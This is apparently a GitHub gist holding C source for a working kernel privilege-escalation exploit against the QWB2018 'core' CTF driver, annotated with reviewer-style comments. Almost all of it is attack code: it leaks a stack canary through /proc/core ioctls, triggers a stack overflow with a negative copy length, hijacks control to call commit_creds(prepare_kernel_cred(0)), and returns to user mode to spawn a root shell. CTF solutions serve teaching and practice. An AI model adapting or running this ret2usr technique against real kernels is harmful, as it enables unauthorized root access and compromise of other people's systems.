@hama7230
Created December 16, 2018 22:33
QWB2018 solid_core
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
/* Opaque kernel types: only pointers to them cross into this program. */
struct cred;
struct task_struct;
/*
 * Function-pointer types for the two kernel symbols that main() resolves
 * at run time from /tmp/kallsyms and that get_root() calls.
 * regparm(3) is an i386 calling-convention attribute; the rest of this file
 * is x86-64 (rax, swapgs, iretq), where the attribute has no effect —
 * presumably carried over from a 32-bit template, TODO confirm.
 */
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
/* Filled in by main(); get_kernel_sym() yields 0 for a missing symbol, so
 * these stay NULL in that case and are not checked before use in get_root(). */
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;
/* Descriptor returned by open("/proc/core", O_RDWR) in main(); every ioctl
 * wrapper below and the write() in main() use it. */
int fd;
/*
 * User-mode context captured before the exploit runs and consumed by the
 * iretq frame built in get_root(). user_stack is assigned the address of
 * main()'s local buffer; it is declared long, so that assignment is a
 * pointer-to-integer conversion without a cast. The other three are written
 * by save_state() from cs, ss and RFLAGS.
 */
long user_stack;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
/*
 * Snapshot the current user-mode segment selectors and flags into the
 * globals user_cs, user_ss and user_rflags so that get_root() can later
 * build an iretq frame returning to this context.
 *
 * The operands are written destination-first with bare register names
 * (see also "mov rax, %0" in get_root), i.e. Intel syntax, so the file has
 * to be compiled with -masm=intel — TODO confirm the build command, the
 * default AT&T dialect reads these operands the other way round.
 * pushfq/popq round-trips RFLAGS through the stack, hence the "memory"
 * clobber so the compiler does not keep stack values cached across it.
 */
static void save_state() {
    __asm__("mov %0, cs\n"
            "mov %1, ss\n"
            "pushfq\n"
            "popq %2\n"
            :"=r"(user_cs),"=r"(user_ss),"=r"(user_rflags)
            :
            :"memory"
    );
}
/*
 * Target of the iretq in get_root(): runs once execution is back in user
 * mode with the credentials installed there. Hands control to /bin/sh via
 * system(); the exit status of the shell is not inspected.
 */
void launch_shell(void) {
    static const char shell_path[] = "/bin/sh";
    (void)system(shell_path);
}
/*
 * Payload that runs in kernel context once main() has redirected control
 * here: call the two resolved kernel functions to install kernel (root)
 * credentials for the current task, then hand-build an iretq frame and
 * return to user mode at launch_shell() with the context saved by
 * save_state().
 *
 * Push order is ss, rsp, rflags, cs, rip — the reverse of what iretq pops —
 * and input operands %0..%4 are bound in exactly that order below; %1 is
 * user_stack, the address of main()'s local buffer. swapgs restores the
 * user GS base before the return.
 *
 * Review notes: rax is written by every "mov rax, %n" but is not in the
 * clobber list, so the compiler is free to allocate one of the "r" inputs
 * to rax, which the first mov would then overwrite. This is also a
 * user-space page executing in ring 0: SMEP would fault on it and a KPTI
 * kernel would need the page-table switch this frame does not perform, so
 * the challenge kernel presumably ships without both — TODO confirm.
 * The two function pointers are used without a NULL check (see main()).
 */
void get_root(void) {
    commit_creds(prepare_kernel_cred(0));
    __asm__("swapgs\n"
            "mov rax, %0\n"
            "push rax\n"
            "mov rax, %1\n"
            "push rax\n"
            "mov rax, %2\n"
            "push rax\n"
            "mov rax, %3\n"
            "push rax\n"
            "mov rax, %4\n"
            "push rax\n"
            "iretq\n"
            :
            :"r"(user_ss),"r"(user_stack),"r"(user_rflags),"r"(user_cs),"r"(launch_shell)
            :"memory"
    );
}
// from https://www.exploit-db.com/exploits/44303
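/*
 * Look up `name` in a kallsyms-style text dump at /tmp/kallsyms (one
 * "<hex address> <type char> <symbol>" record per line, as /proc/kallsyms
 * prints them) and return the address on the first matching line.
 *
 * name:    NUL-terminated symbol name to search for.
 * returns: the parsed address, or 0 when no line matches.
 * exits:   with status -1 when /tmp/kallsyms cannot be opened.
 *
 * Fix: the symbol field used to be read with an unbounded "%s" into the
 * 256-byte stack buffer, so a symbol longer than 255 characters in the dump
 * overflowed this function's own stack frame. Both reads are now bounded
 * to 255 characters plus the terminator. The address is parsed with "%lx"
 * straight into an unsigned long instead of "%p" through a void ** cast,
 * which quietly relied on sizeof(void *) == sizeof(unsigned long).
 */
unsigned long get_kernel_sym(char *name)
{
    char sname[256];
    unsigned long addr = 0;
    char type = 0;

    FILE *f = fopen("/tmp/kallsyms", "r");
    if (f == NULL) {
        printf("[-] Failed to open /tmp/kallsyms\n");
        exit(-1);
    }
    printf("[+] Find %s...\n", name);

    int ret = 0;
    while (ret != EOF) {
        /* Width 255 leaves room for the terminator in sname[256]. */
        ret = fscanf(f, "%lx %c %255s\n", &addr, &type, sname);
        if (ret == 0) {
            /* Input does not start with a hex address (e.g. a trailing
             * "[module]" token): drop one whitespace-delimited token and
             * resynchronise on the next line. */
            ret = fscanf(f, "%255s\n", sname);
            continue;
        }
        /* Only a fully parsed record may match; a partial read (EOF in the
         * middle of a line) leaves sname stale. */
        if (ret == 3 && strcmp(name, sname) == 0) {
            fclose(f);
            printf("[+] Found %s at %lx\n", name, addr);
            return addr;
        }
    }
    fclose(f);
    return 0;
}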
/*
 * Issue the 0x6677889A request on the /proc/core descriptor with `size` as
 * the argument. What the driver does with it is defined by the challenge
 * module, which is not on this page; main() calls this last with a value
 * that is negative as a long. The ioctl result is discarded.
 */
void core_copy(long size) {
    enum { CORE_COPY_REQUEST = 0x6677889A };
    (void)ioctl(fd, CORE_COPY_REQUEST, size);
}
/*
 * Issue the 0x6677889B request on the /proc/core descriptor, passing `buf`
 * as the argument. main() calls it after set_off(0x40) and reads the first
 * word of the buffer back; how much the driver copies, and from where, is
 * driver-defined and not visible here. The ioctl result is discarded.
 */
void core_read(char* buf) {
    enum { CORE_READ_REQUEST = 0x6677889B };
    (void)ioctl(fd, CORE_READ_REQUEST, buf);
}
/*
 * Issue the 0x6677889C request on the /proc/core descriptor with `off` as
 * the argument. main() calls it once with 0x40 before core_read(); the
 * driver presumably keeps the value as an offset for later requests — the
 * driver is not on this page, so confirm against its source. The ioctl
 * result is discarded.
 */
void set_off(unsigned long off) {
    enum { CORE_SET_OFF_REQUEST = 0x6677889C };
    (void)ioctl(fd, CORE_SET_OFF_REQUEST, off);
}
/*
 * Exploit driver for the QWB2018 "core" challenge (page title).
 * Sequence: capture the user-mode context, resolve the two kernel symbols
 * from /tmp/kallsyms, open /proc/core, read a value back at driver offset
 * 0x40 (the program's own message calls it the kernel canary), then write
 * a buffer whose words at 0x40/0x48/0x50 hold that value, the user stack
 * address and get_root, and trigger core_copy() with an oversized length.
 *
 * Exits with status 1 when /proc/core cannot be opened. Returns 0 only if
 * the trigger comes back here; on a successful hijack get_root() presumably
 * never returns and launch_shell() runs instead.
 *
 * The offsets and ioctl numbers are specific to the challenge driver, which
 * is not on this page; presumably 0x40/0x48/0x50 line up with the canary,
 * saved frame pointer and return address of the driver's stack frame —
 * confirm against the driver source. From a monitoring standpoint the whole
 * sequence is an unprivileged open of /proc/core followed by ioctl and
 * write calls on it.
 */
int main(void) {
    unsigned long buf[0x800/8];                 /* 0x800 bytes = 256 words */
    user_stack = buf;                           /* pointer stored in a long, no cast */
    save_state();
    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
    /* get_kernel_sym() returns 0 for a missing symbol; the resulting NULL
     * function pointers are not checked before get_root() calls them. */
    puts("open /proc/core");
    fd = open("/proc/core", O_RDWR);
    if (fd < 0)
        exit(1);
    puts("leak kernel canary");
    memset(buf, 0, 0x800);                      /* same size as sizeof buf */
    set_off(0x40);
    core_read(buf);                             /* unsigned long * passed for a char * parameter */
    unsigned long canary = buf[0];
    printf("canary = %lx\n", canary);
    puts("cause stack bof");
    buf[0x40/8] = canary;
    buf[0x48/8] = user_stack;
    buf[0x50/8] = get_root;                     /* function pointer stored as an integer, no cast */
    write(fd, buf, 0x200);                      /* return value not checked */
    core_copy(0xffffffffffff0080);              /* becomes a negative long; meaning is driver-defined */
    return 0;
}